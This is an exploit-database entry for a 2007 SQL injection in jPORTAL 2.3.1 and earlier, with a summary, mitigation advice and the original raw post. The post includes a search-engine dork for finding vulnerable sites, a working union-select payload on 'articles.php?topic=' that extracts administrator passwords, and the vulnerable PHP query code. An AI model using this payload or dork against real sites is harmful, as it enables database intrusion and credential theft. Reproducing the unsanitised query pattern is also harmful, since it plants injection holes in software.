header-logo
Suggest Exploit
vendor:
jPORTAL
by:
Alexsize
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: jPORTAL
Affected Version From: jPORTAL <= 2.3.1
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

jPORTAL =< 2.3.1 and Remote SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection attacks through the 'articles.php?topic=' parameter. By manipulating the parameter, an attacker can execute arbitrary SQL queries, potentially gaining unauthorized access to the database.

Mitigation:

To mitigate the vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Upgrading to a patched version of jPORTAL is also advised.
Source

Exploit-DB raw data:

Title:jPORTAL =< 2.3.1 and  Remote SQL Injection Vulnerability
Dork:  intext:"jPORTAL 2" & inurl:"articles.php?topic="

Autor:  Alexsize
E-Mail: Alexsize@mail.ru
Site:   Antichat.ru


articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/

Vuln code:

function topic_name($a)  
{     
global $topic_tbl; 
$query = "SELECT * FROM $topic_tbl WHERE id=$a"; 
$result = mysql_query($query);   
$r = mysql_fetch_array($result);     
return '<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>';   
} 

C уважением, Alexsize.

# milw0rm.com [2007-11-09]

Navigation

Suggest Exploit

Services By CQR